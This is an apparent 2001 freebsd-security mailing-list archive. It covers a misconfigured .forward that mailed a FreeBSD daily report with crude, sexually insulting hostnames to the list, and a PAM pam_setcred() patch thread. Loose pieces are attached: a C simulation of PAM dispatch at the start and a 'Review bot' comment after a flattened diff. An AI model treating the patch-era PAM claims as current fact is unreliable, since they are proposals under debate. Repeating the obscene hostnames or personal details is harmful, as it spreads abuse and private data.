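    if (patched)
        actions_setcred_all(cred_actions);
    else
        memcpy(cred_actions, auth_actions, sizeof cred_actions);
    lg->n = 0;
    return dispatch(stack, 2, cred_actions, 1, lg);
}

/* 1 if pam_krb5's pam_sm_setcred() ran in the given configuration. */
static int krb5_setcred_called(int patched, int krb5_setcred_ret)
{
    struct call_log lg = { {0}, 0 };
    run_login(patched, krb5_setcred_ret, &lg);
    for (int i = 0; i < lg.n; i++)
        if (strcmp(lg.names[i], "pam_krb5") == 0) return 1;
    return 0;
}

static int setcred_status(int patched, int krb5_setcred_ret)
{
    struct call_log lg = { {0}, 0 };
    return run_login(patched, krb5_setcred_ret, &lg);
}

int main(void)
{
    printf("unpatched: krb5 setcred called=%d status=%d\n",
           krb5_setcred_called(0, PAM_SUCCESS), setcred_status(0, PAM_SUCCESS));
    printf("patched:   krb5 setcred called=%d status=%d\n",
           krb5_setcred_called(1, PAM_SUCCESS), setcred_status(1, PAM_SUCCESS));
    /* The cost of IGNORE for every failure code: a real setcred error in
     * pam_krb5 is masked and pam_setcred() still reports success. */
    printf("patched, krb5 setcred fails: status=%d\n", setcred_status(1, PAM_CRED_ERR));
    return 0;
}
```

Unpatched, pam_skey's setcred returns PAM_SUCCESS, the "sufficient" table turns that into DONE, and pam_krb5's setcred is never reached; with the patch's table every auth module's setcred runs. The last call shows the side of that table worth knowing about: because every non-success code is ignored, a setcred failure in the module that did the authenticating does not change the result.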
From: root@unloved.org (Charlie Root)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Removing stale files from /var/preserve:

Cleaning out old system announcements:

Removing stale files from /var/rwho:

Backup passwd and group files:
kyra.unloved.org passwd diffs:
68d67
< orion:(password):2004:2004::0:0:Orion Server:/home/orion:/usr/local/bin/bash
69a69
> postfix:(password):2001:3024::0:0:Postfix Mail System:/nonexistent:/nonexistent
kyra.unloved.org group diffs:
93a94
> postfix:*:3024:

Verifying group file syntax:

Backing up mail aliases:
kyra.unloved.org aliases diffs:
--- /var/backups/aliases.bak	Thu Sep 21 17:28:04 2000
+++ /etc/mail/aliases	Mon Jan 22 11:02:55 2001
@@ -1,4 +1,4 @@
-# $FreeBSD: src/etc/mail/aliases,v 1.10.4.1 2000/08/27 17:31:38 gshapiro Exp $
+# $FreeBSD: src/etc/mail/aliases,v 1.10.4.2 2000/12/16 07:03:35 dougb Exp $
 #	@(#)aliases	5.3 (Berkeley) 5/24/90
 #
 #	Aliases in this file will NOT be expanded in the header from
@@ -24,8 +24,10 @@
 # General redirections for pseudo accounts
 bin:	root
+bind:	root
 daemon:	root
 games:	root
+kmem:	root
 man:	root
 news:	root
 nobody:	root
@@ -33,6 +35,7 @@
 pop:	root
 system:	root
 toor:	root
+tty:	root
 usenet:	news
 uucp:	root
 xten:	root

Disk status:
Filesystem   1K-blocks     Used    Avail Capacity  Mounted on
/dev/ad5s1a     198399    51629   130899    28%    /
/dev/ad5s2e    9505261   539884  8204957     6%    /data
/dev/ad5s1f    8473272  2924146  4871265    38%    /usr
/dev/ad5s1e     992239    18696   894164     2%    /var
procfs               4        4        0   100%    /proc

Last dump(s) done (Dump '>' file systems):

UUCP status:

Network interface status:
Name  Mtu   Network        Address               Ipkts Ierrs    Opkts Oerrs  Coll
xl0   1500                 00:10:4b:09:ec:f0  49045770     0 84287087     4     0
xl0   1500  62.58.62.160/  kyra               49045770     0 84287087     4     0
xl0   1500  jacquie.would  jacquie.would.b    49045770     0 84287087     4     0
xl0   1500  my.pussy.gets  my.pussy.gets.w    49045770     0 84287087     4     0
xl0   1500  jacquie.loves  jacquie.loves.a    49045770     0 84287087     4     0
xl0   1500  twilight.bast  twilight.bastar    49045770     0 84287087     4     0
xl0   1500  freebsd.is.be  freebsd.is.bett    49045770     0 84287087     4     0
xl0   1500  magic.kablast  magic.kablasto.    49045770     0 84287087     4     0
xl0   1500  i.own.decix.n  i.own.decix.net    49045770     0 84287087     4     0
xl0   1500  teefers.is.th  teefers.is.thra    49045770     0 84287087     4     0
xl0   1500  i.fucked.freu  i.fucked.freudi    49045770     0 84287087     4     0
xl0   1500  jacquie.swall  jacquie.swallow    49045770     0 84287087     4     0
xl0   1500  unhappy.and/3  unhappy.and        49045770     0 84287087     4     0
xl0   1500  attyz.wants.t  attyz.wants.to.    49045770     0 84287087     4     0
xl0   1500  jacquie.is.a.  jacquie.is.a.cu    49045770     0 84287087     4     0
xl0   1500  i.am.not.real  i.am.not.really    49045770     0 84287087     4     0
xl0   1500  you.need.a.go  you.need.a.good    49045770     0 84287087     4     0
xl0   1500  will.never.be  will.never.be      49045770     0 84287087     4     0
xl0   1500  vanitywhore.o  vanitywhore.org    49045770     0 84287087     4     0
xl0   1500  is.a.masturba  is.a.masturbati    49045770     0 84287087     4     0
xl0   1500  works.for.ver  works.for.versa    49045770     0 84287087     4     0
xl0   1500  deeply.shallo  deeply.shallow.    49045770     0 84287087     4     0
xl0   1500  62.58.48.84/3  62.58.48.84        49045770     0 84287087     4     0
lo0   16384                                       5114     0     5114     0     0
lo0   16384 127            localhost              5114     0     5114     0     0

Local system status:
 3:01AM  up 15:55, 1 user, load averages: 0.00, 0.00, 0.00

Mail in local queue:
Mail queue is empty

Security check:
    (output mailed separately)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 18: 8:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from kyra.unloved.org (kyra.unloved.org [62.58.62.162]) by hub.freebsd.org (Postfix) with ESMTP id B9C1237B402; Mon, 22 Jan 2001 18:06:15 -0800 (PST)
Received: by kyra.unloved.org (Postfix) id E543DF431; Tue, 23 Jan 2001 03:06:14 +0100 (CET)
Delivered-To: ashp@unloved.org
Received: by kyra.unloved.org (Postfix) via BOUNCE id B6B6FF40E; Tue, 23 Jan 2001 03:06:14 +0100 (CET)
Date: Tue, 23 Jan 2001 03:06:14 +0100 (CET)
From: MAILER-DAEMON@unloved.org (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: root@unloved.org
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="13586F431.980215574/kyra.unloved.org"
Message-Id: <20010123020614.B6B6FF40E@kyra.unloved.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is a MIME-encapsulated message.

--13586F431.980215574/kyra.unloved.org
Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host kyra.unloved.org.

I'm sorry to have to inform you that the message returned below could not
be delivered to one or more destinations.

For further assistance, please send mail to

If you do so, please include this problem report. You can delete your own
text from the message returned below.

			The Postfix program

<$header_To@unloved.org>: unknown user: "$header_to"
<$home/Mail/lists/freebsd-arch@unloved.org>: unknown user: "$home/mail/lists/freebsd-arch"
<$home/Mail/lists/bugtraq@unloved.org>: unknown user: "$home/mail/lists/bugtraq"
<$home/Mail/lists/freebsd-current@unloved.org>: unknown user: "$home/mail/lists/freebsd-current"
<$home/Mail/lists/freebsd-cvs@unloved.org>: unknown user: "$home/mail/lists/freebsd-cvs"
<$home/Mail/lists/freebsd-security@unloved.org>: unknown user: "$home/mail/lists/freebsd-security"
<$home/Mail/lists/freeciv@unloved.org>: unknown user: "$home/mail/lists/freeciv"
<^freeciv-dev@unloved.org>: unknown user: "^freeciv-dev"
: unknown user: "contains"
: unknown user: "endif"
: unknown user: "if"
: unknown user: "matches"
: unknown user: "or"
: unknown user: "save"
: unknown user: "then"
<$header_sender@unloved.org>: unknown user: "$header_sender"
<$header_X-list@unloved.org>: unknown user: "$header_x-list"
<$header_Cc@unloved.org>: unknown user: "$header_cc"

--13586F431.980215574/kyra.unloved.org
Content-Description: Delivery error report
Content-Type: message/delivery-status

Reporting-MTA: dns; kyra.unloved.org
Arrival-Date: Tue, 23 Jan 2001 03:06:08 +0100 (CET)

Final-Recipient: rfc822; $header_To@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$header_to"

Final-Recipient: rfc822; $home/Mail/lists/freebsd-arch@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-arch"

Final-Recipient: rfc822; $home/Mail/lists/bugtraq@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/bugtraq"

Final-Recipient: rfc822; $home/Mail/lists/freebsd-current@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-current"

Final-Recipient: rfc822; $home/Mail/lists/freebsd-cvs@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-cvs"

Final-Recipient: rfc822; $home/Mail/lists/freebsd-security@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-security"

Final-Recipient: rfc822; $home/Mail/lists/freeciv@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freeciv"

Final-Recipient: rfc822; ^freeciv-dev@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "^freeciv-dev"

Final-Recipient: rfc822; contains@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "contains"

Final-Recipient: rfc822; endif@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "endif"

Final-Recipient: rfc822; if@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "if"

Final-Recipient: rfc822; matches@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "matches"

Final-Recipient: rfc822; or@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "or"

Final-Recipient: rfc822; save@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "save"

Final-Recipient: rfc822; then@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "then"

Final-Recipient: rfc822; $header_sender@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$header_sender"

Final-Recipient: rfc822; $header_X-list@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$header_x-list"

Final-Recipient: rfc822; $header_Cc@unloved.org
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; unknown user: "$header_cc"

--13586F431.980215574/kyra.unloved.org
Content-Description: Undelivered Message
Content-Type: message/rfc822

Received: by kyra.unloved.org (Postfix) id 13586F431; Tue, 23 Jan 2001 03:06:08 +0100 (CET)
Delivered-To: ashp@unloved.org
Received: by kyra.unloved.org (Postfix, from userid 0) id 7E839F40E; Tue, 23 Jan 2001 03:06:07 +0100 (CET)
To: root@unloved.org
Subject: kyra.unloved.org daily run output
Message-Id: <20010123020607.7E839F40E@kyra.unloved.org>
Date: Tue, 23 Jan 2001 03:06:07 +0100 (CET)
From: root@unloved.org (Charlie Root)

Removing stale files from /var/preserve:

Cleaning out old system announcements:

Removing stale files from /var/rwho:

Backup passwd and group files:
kyra.unloved.org passwd diffs:
68d67
< orion:(password):2004:2004::0:0:Orion Server:/home/orion:/usr/local/bin/bash
69a69
> postfix:(password):2001:3024::0:0:Postfix Mail System:/nonexistent:/nonexistent
kyra.unloved.org group diffs:
93a94
> postfix:*:3024:

Verifying group file syntax:

Backing up mail aliases:
kyra.unloved.org aliases diffs:
--- /var/backups/aliases.bak	Thu Sep 21 17:28:04 2000
+++ /etc/mail/aliases	Mon Jan 22 11:02:55 2001
@@ -1,4 +1,4 @@
-# $FreeBSD: src/etc/mail/aliases,v 1.10.4.1 2000/08/27 17:31:38 gshapiro Exp $
+# $FreeBSD: src/etc/mail/aliases,v 1.10.4.2 2000/12/16 07:03:35 dougb Exp $
 #	@(#)aliases	5.3 (Berkeley) 5/24/90
 #
 #	Aliases in this file will NOT be expanded in the header from
@@ -24,8 +24,10 @@
 # General redirections for pseudo accounts
 bin:	root
+bind:	root
 daemon:	root
 games:	root
+kmem:	root
 man:	root
 news:	root
 nobody:	root
@@ -33,6 +35,7 @@
 pop:	root
 system:	root
 toor:	root
+tty:	root
 usenet:	news
 uucp:	root
 xten:	root

Disk status:
Filesystem   1K-blocks     Used    Avail Capacity  Mounted on
/dev/ad5s1a     198399    51629   130899    28%    /
/dev/ad5s2e    9505261   539884  8204957     6%    /data
/dev/ad5s1f    8473272  2924146  4871265    38%    /usr
/dev/ad5s1e     992239    18696   894164     2%    /var
procfs               4        4        0   100%    /proc

Last dump(s) done (Dump '>' file systems):

UUCP status:

Network interface status:
Name  Mtu   Network        Address               Ipkts Ierrs    Opkts Oerrs  Coll
xl0   1500                 00:10:4b:09:ec:f0  49045770     0 84287087     4     0
xl0   1500  62.58.62.160/  kyra               49045770     0 84287087     4     0
xl0   1500  jacquie.would  jacquie.would.b    49045770     0 84287087     4     0
xl0   1500  my.pussy.gets  my.pussy.gets.w    49045770     0 84287087     4     0
xl0   1500  jacquie.loves  jacquie.loves.a    49045770     0 84287087     4     0
xl0   1500  twilight.bast  twilight.bastar    49045770     0 84287087     4     0
xl0   1500  freebsd.is.be  freebsd.is.bett    49045770     0 84287087     4     0
xl0   1500  magic.kablast  magic.kablasto.    49045770     0 84287087     4     0
xl0   1500  i.own.decix.n  i.own.decix.net    49045770     0 84287087     4     0
xl0   1500  teefers.is.th  teefers.is.thra    49045770     0 84287087     4     0
xl0   1500  i.fucked.freu  i.fucked.freudi    49045770     0 84287087     4     0
xl0   1500  jacquie.swall  jacquie.swallow    49045770     0 84287087     4     0
xl0   1500  unhappy.and/3  unhappy.and        49045770     0 84287087     4     0
xl0   1500  attyz.wants.t  attyz.wants.to.    49045770     0 84287087     4     0
xl0   1500  jacquie.is.a.  jacquie.is.a.cu    49045770     0 84287087     4     0
xl0   1500  i.am.not.real  i.am.not.really    49045770     0 84287087     4     0
xl0   1500  you.need.a.go  you.need.a.good    49045770     0 84287087     4     0
xl0   1500  will.never.be  will.never.be      49045770     0 84287087     4     0
xl0   1500  vanitywhore.o  vanitywhore.org    49045770     0 84287087     4     0
xl0   1500  is.a.masturba  is.a.masturbati    49045770     0 84287087     4     0
xl0   1500  works.for.ver  works.for.versa    49045770     0 84287087     4     0
xl0   1500  deeply.shallo  deeply.shallow.    49045770     0 84287087     4     0
xl0   1500  62.58.48.84/3  62.58.48.84        49045770     0 84287087     4     0
lo0   16384                                       5114     0     5114     0     0
lo0   16384 127            localhost              5114     0     5114     0     0

Local system status:
 3:01AM  up 15:55, 1 user, load averages: 0.00, 0.00, 0.00

Mail in local queue:
Mail queue is empty

Security check:
    (output mailed separately)

--13586F431.980215574/kyra.unloved.org--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 18: 8:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from kyra.unloved.org (kyra.unloved.org [62.58.62.162]) by hub.freebsd.org (Postfix) with ESMTP id 5D1C937B404; Mon, 22 Jan 2001 18:06:17 -0800 (PST)
Received: by kyra.unloved.org (Postfix) id 71C2CF432; Tue, 23 Jan 2001 03:06:16 +0100 (CET)
Delivered-To: ashp@unloved.org
Received: by kyra.unloved.org (Postfix) via BOUNCE id 24DA6F40E; Tue, 23 Jan 2001 03:06:16 +0100 (CET)
Date: Tue, 23 Jan 2001 03:06:16 +0100 (CET)
From: MAILER-DAEMON@unloved.org (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: root@unloved.org
Message-Id: <20010123020616.24DA6F40E@kyra.unloved.org>

This is a MIME-encapsulated message.

Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host kyra.unloved.org.

I'm sorry to have to inform you that the message returned below could not be
delivered to one or more destinations.

For further assistance, please send mail to
If you do so, please include this problem report. You can delete your own text
from the message returned below.

                        The Postfix program

<$header_Cc@unloved.org>: unknown user: "$header_cc"
<$header_sender@unloved.org>: unknown user: "$header_sender"
<$home/Mail/lists/bugtraq@unloved.org>: unknown user: "$home/mail/lists/bugtraq"
<$home/Mail/lists/freebsd-arch@unloved.org>: unknown user: "$home/mail/lists/freebsd-arch"
<$home/Mail/lists/freebsd-current@unloved.org>: unknown user: "$home/mail/lists/freebsd-current"
<$home/Mail/lists/freebsd-security@unloved.org>: unknown user: "$home/mail/lists/freebsd-security"
<$home/Mail/lists/freeciv@unloved.org>: unknown user: "$home/mail/lists/freeciv"
<^freeciv-dev@unloved.org>: unknown user: "^freeciv-dev"
<contains@unloved.org>: unknown user: "contains"
<endif@unloved.org>: unknown user: "endif"
<if@unloved.org>: unknown user: "if"
<matches@unloved.org>: unknown user: "matches"
<or@unloved.org>: unknown user: "or"
<save@unloved.org>: unknown user: "save"
<then@unloved.org>: unknown user: "then"
<$header_To@unloved.org>: unknown user: "$header_to"
<$header_X-list@unloved.org>: unknown user: "$header_x-list"
<$home/Mail/lists/freebsd-cvs@unloved.org>: unknown user: "$home/mail/lists/freebsd-cvs"

Content-Description: Delivery error report
Content-Type: message/delivery-status

Reporting-MTA: dns; kyra.unloved.org
Arrival-Date: Tue, 23 Jan 2001 03:06:08 +0100 (CET)

Content-Description: Undelivered Message
Content-Type: message/rfc822

Subject: kyra.unloved.org security check output
Message-Id: <20010123020607.1CCE2F40C@kyra.unloved.org>
Date: Tue, 23 Jan 2001 03:06:07 +0100 (CET)
From: root@unloved.org (Charlie Root)
To: undisclosed-recipients: ;

Checking setuid files and devices:
kyra.unloved.org setuid diffs:

Checking for uids of 0:
root 0
toor 0

Checking for passwordless accounts:

kyra.unloved.org kernel log messages:
> Copyright (c) 1992-2001 The FreeBSD Project.
> FreeBSD 4.2-STABLE #0: Sun Jan 21 19:59:44 CET 2001
>     ashp@kyra.unloved.org:/usr/obj/usr/src/sys/KYRA
> avail memory = 258371584 (252316K bytes)

kyra.unloved.org login failures:

kyra.unloved.org refused connections:

From owner-freebsd-security Mon Jan 22 19:34:56 2001
Message-ID: <3A6CFB44.7CCD8D88@euphoria.confusion.net>
Date: Mon, 22 Jan 2001 21:32:20 -0600
From: Laurence Berland
To: security@freebsd.org
Subject: Re: kyra.unloved.org daily run output
References: <20010123020607.7E839F40E@kyra.unloved.org>

What do we make of this?

Charlie Root wrote:
>
> Removing stale files from /var/preserve:
>
> Cleaning out old system announcements:
>
> Removing stale files from /var/rwho:
>
> Backup passwd and group files:
> kyra.unloved.org passwd diffs:
> 68d67
> < orion:(password):2004:2004::0:0:Orion Server:/home/orion:/usr/local/bin/bash
> 69a69
> > postfix:(password):2001:3024::0:0:Postfix Mail System:/nonexistent:/nonexistent
> kyra.unloved.org group diffs:
> 93a94
> > postfix:*:3024:
>
> Verifying group file syntax:
>
> Backing up mail aliases:
> kyra.unloved.org aliases diffs:
> --- /var/backups/aliases.bak Thu Sep 21 17:28:04 2000
> +++ /etc/mail/aliases Mon Jan 22 11:02:55 2001
> @@ -1,4 +1,4 @@
> -# $FreeBSD: src/etc/mail/aliases,v 1.10.4.1 2000/08/27 17:31:38 gshapiro Exp $
> +# $FreeBSD: src/etc/mail/aliases,v 1.10.4.2 2000/12/16 07:03:35 dougb Exp $
> # @(#)aliases 5.3 (Berkeley) 5/24/90
> #
> # Aliases in this file will NOT be expanded in the header from
> @@ -24,8 +24,10 @@
>
> # General redirections for pseudo accounts
> bin: root
> +bind: root
> daemon: root
> games: root
> +kmem: root
> man: root
> news: root
> nobody: root
> @@ -33,6 +35,7 @@
> pop: root
> system: root
> toor: root
> +tty: root
> usenet: news
> uucp: root
> xten: root
>
> Disk status:
> Filesystem 1K-blocks Used Avail Capacity Mounted on
> /dev/ad5s1a 198399 51629 130899 28% /
> /dev/ad5s2e 9505261 539884 8204957 6% /data
> /dev/ad5s1f 8473272 2924146 4871265 38% /usr
> /dev/ad5s1e 992239 18696 894164 2% /var
> procfs 4 4 0 100% /proc
>
> Last dump(s) done (Dump '>' file systems):
>
> UUCP status:
>
> Network interface status:
> Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Coll
> xl0 1500 00:10:4b:09:ec:f0 49045770 0 84287087 4 0
> xl0 1500 62.58.62.160/ kyra 49045770 0 84287087 4 0
> xl0 1500 jacquie.would jacquie.would.b 49045770 0 84287087 4 0
> xl0 1500 my.pussy.gets my.pussy.gets.w 49045770 0 84287087 4 0
> xl0 1500 jacquie.loves jacquie.loves.a 49045770 0 84287087 4 0
> xl0 1500 twilight.bast twilight.bastar 49045770 0 84287087 4 0
> xl0 1500 freebsd.is.be freebsd.is.bett 49045770 0 84287087 4 0
> xl0 1500 magic.kablast magic.kablasto. 49045770 0 84287087 4 0
> xl0 1500 i.own.decix.n i.own.decix.net 49045770 0 84287087 4 0
> xl0 1500 teefers.is.th teefers.is.thra 49045770 0 84287087 4 0
> xl0 1500 i.fucked.freu i.fucked.freudi 49045770 0 84287087 4 0
> xl0 1500 jacquie.swall jacquie.swallow 49045770 0 84287087 4 0
> xl0 1500 unhappy.and/3 unhappy.and 49045770 0 84287087 4 0
> xl0 1500 attyz.wants.t attyz.wants.to. 49045770 0 84287087 4 0
> xl0 1500 jacquie.is.a. jacquie.is.a.cu 49045770 0 84287087 4 0
> xl0 1500 i.am.not.real i.am.not.really 49045770 0 84287087 4 0
> xl0 1500 you.need.a.go you.need.a.good 49045770 0 84287087 4 0
> xl0 1500 will.never.be will.never.be 49045770 0 84287087 4 0
> xl0 1500 vanitywhore.o vanitywhore.org 49045770 0 84287087 4 0
> xl0 1500 is.a.masturba is.a.masturbati 49045770 0 84287087 4 0
> xl0 1500 works.for.ver works.for.versa 49045770 0 84287087 4 0
> xl0 1500 deeply.shallo deeply.shallow. 49045770 0 84287087 4 0
> xl0 1500 62.58.48.84/3 62.58.48.84 49045770 0 84287087 4 0
> lo0 16384 5114 0 5114 0 0
> lo0 16384 127 localhost 5114 0 5114 0 0
>
> Local system status:
> 3:01AM up 15:55, 1 user, load averages: 0.00, 0.00, 0.00
>
> Mail in local queue:
> Mail queue is empty
>
> Security check:
> (output mailed separately)

--
Laurence Berland
Intern, Flooz.com
Northwestern '04
stuyman@confusion.net

From owner-freebsd-security Mon Jan 22 19:54:13 2001
Message-Id: <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com>
Date: Mon, 22 Jan 2001 19:55:05 -0800
To: Laurence Berland, security@FreeBSD.ORG
From: Jamie Lawrence
Subject: Re: kyra.unloved.org daily run output
In-Reply-To: <3A6CFB44.7CCD8D88@euphoria.confusion.net>
References: <20010123020607.7E839F40E@kyra.unloved.org>

At 09:32 PM 1/22/01 -0600, Laurence Berland wrote:
>What do we make of this?

That someone has extremely interesting DNS entries?

-j

From owner-freebsd-security Mon Jan 22 20:41: 8 2001
Message-ID: <3A6D0AB9.E5D956C9@allmaui.com>
Date: Mon, 22 Jan 2001 20:38:17 -0800
From: Craig Cowen
To: Jamie Lawrence
Cc: Laurence Berland, security@FreeBSD.ORG
Subject: Re: kyra.unloved.org daily run output
References: <20010123020607.7E839F40E@kyra.unloved.org> <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com>

And a 3com card

Jamie Lawrence wrote:
> At 09:32 PM 1/22/01 -0600, Laurence Berland wrote:
> >What do we make of this?
>
> That someone has extremely interesting DNS entries?
>
> -j

From owner-freebsd-security Mon Jan 22 20:52:48 2001
Message-ID: <3A6D0DD8.DA886CE4@allmaui.com>
Date: Mon, 22 Jan 2001 20:51:36 -0800
From: Craig Cowen
To: Jamie Lawrence, security@FreeBSD.ORG
Subject: Re: kyra.unloved.org daily run output
References: <20010123020607.7E839F40E@kyra.unloved.org> <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com> <3A6D0AB9.E5D956C9@allmaui.com>

We know he/she/it doesn't have a clue

Craig Cowen wrote:
> And a 3com card
>
> Jamie Lawrence wrote:
>
> > At 09:32 PM 1/22/01 -0600, Laurence Berland wrote:
> > >What do we make of this?
> >
> > That someone has extremely interesting DNS entries?
> >
> > -j

From owner-freebsd-security Mon Jan 22 21:17:48 2001
Message-ID: <3A6D1354.5A0B4CFB@fpsn.net>
Date: Mon, 22 Jan 2001 22:15:00 -0700
From: Colin Faber
Reply-To: cfaber@fpsn.net
Organization: fpsn.net, Inc.
To: security@FreeBSD.ORG
Subject: Re: kyra.unloved.org daily run output
References: <20010123020607.7E839F40E@kyra.unloved.org> <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com> <3A6D0AB9.E5D956C9@allmaui.com> <3A6D0DD8.DA886CE4@allmaui.com>

Don't forget proper backups

Craig Cowen wrote:
> We know he/she/it doesn't have a clue
>
> Craig Cowen wrote:
>
> > And a 3com card
> >
> > Jamie Lawrence wrote:
> >
> > > At 09:32 PM 1/22/01 -0600, Laurence Berland wrote:
> > > >What do we make of this?
> > >
> > > That someone has extremely interesting DNS entries?
> > >
> > > -j

From owner-freebsd-security Tue Jan 23 1:47: 4 2001
Date: Tue, 23 Jan 2001 10:46:53 +0100
From: Ashley Penney
To: Laurence Berland
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: kyra.unloved.org daily run output
Message-ID: <20010123104653.A7601@daphne.unloved.org>
References: <20010123020607.7E839F40E@kyra.unloved.org> <3A6CFB44.7CCD8D88@euphoria.confusion.net>
In-Reply-To: <3A6CFB44.7CCD8D88@euphoria.confusion.net>; from stuyman@euphoria.confusion.net on Mon, Jan 22, 2001 at 09:32:20PM -0600

On Mon, Jan 22, 2001 at 09:32:20PM -0600, Laurence Berland said:
> What do we make of this?

I'm an idiot? :)

I moved from exim to postfix, and left behind an old exim filtering .forward; exim uses this bizarre .forward syntax to filter. However, if you change to a different MTA, it happily emails everything it finds between the perl syntax, doing stupidities like this. I've had so much hate mail. :)

--
"Go to Heaven for the climate, Hell for the company." -- Mark Twain

From owner-freebsd-security Tue Jan 23 10:40:16 2001
To: "Jacques A. Vidrine", "David J. MacKenzie", freebsd-security@freebsd.org
Subject: Re: Fwd: [PAM broken design? pam_setcred]
In-Reply-To: Message from "Jacques A. Vidrine" of "Mon, 22 Jan 2001 08:54:59 CST." <20010122085459.A93103@hamlet.nectar.com>
Date: Tue, 23 Jan 2001 13:39:44 -0500
From: "David J. MacKenzie"
Message-Id: <20010123183944.4A4C83E5B@catapult.web.us.uu.net>

I forwarded your example to the Linux-PAM maintainers, and got back a reply favoring the approach you intuitively expect: to save the pam_sm_authenticate() results and call the same modules' pam_sm_setcred() functions. The bug report is in the tracking system at:

http://sourceforge.net/bugs/?func=detailbug&bug_id=129775&group_id=6663

From owner-freebsd-security Tue Jan 23 10:47: 3 2001
From: "David J. MacKenzie"
To: freebsd-security@freebsd.org
Cc: djm@web.us.uu.net
Subject: PAM patches, iteration 4
X-Tom-Swiftie: "I've finished counting the horses," Tom said summarily
Message-Id: <20010123184611.E675046C7@dagger.web.us.uu.net>
Date: Tue, 23 Jan 2001 13:46:11 -0500 (EST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've updated the docs to reflect PAM, cleaned up some error handling, and included my patch to work around the pam_setcred() dispatch problem. I also removed the non-logincap code path from su and rshd, since it's already mandatory in login. As before, this replaces my earlier patches. I'd welcome having PAM experts examine them closely. I think they're ready for a wider audience.

--- ./contrib/libpam/doc/man/pam_setcred.3 1998/11/18 01:20:54 1.1 +++ ./contrib/libpam/doc/man/pam_setcred.3 2001/01/23 01:24:58 @@ -16,7 +16,7 @@ This function is used to establish, maintain and delete the credentials of a user. It should be called after a user has been -authenticated and before a session is opened for the user (with +authenticated and after a session is opened for the user (with .BR pam_open_session "(3))." It should be noted that credentials come in many forms. Examples @@ -29,6 +29,23 @@ .BR initgroups "(2) " (or equivalent) should have been performed. +This function runs the +.BI pam_sm_setcred() +functions for all +.BR auth +modules defined for the current PAM service, even if a control flag +of +.BR sufficient +or +.BR requisite +is present. This is to ensure that a module whose +.BI pam_sm_setcred() +function returns +.BR PAM_SUCCESS +even if that module did not succeed in +.BI pam_authenticate() +does not prevent modules listed later from setting their credentials. +It also appears to be the behavior of Solaris PAM. .SH "VALID FLAGS" .TP .BR PAM_ESTABLISH_CRED --- ./contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:19:52 1.1 +++ ./contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:22:44
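Review bot: the added pam_setcred.3 paragraph documents a FreeBSD-local workaround that the Linux-PAM maintainers (per the bug 129775 reply earlier in this thread) would rather fix by recording which modules succeeded in pam_sm_authenticate() and running only their pam_sm_setcred(); say so in the text so the paragraph can be dropped when the upstream fix is imported, and either verify or remove "It also appears to be the behavior of Solaris PAM", which is a guess in a reference page. The first hunk also turns "before a session is opened" into "after a session is opened", which reverses the call order every existing application was written against; spell out that pam_open_session(3) must now be called first rather than just swapping the word.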
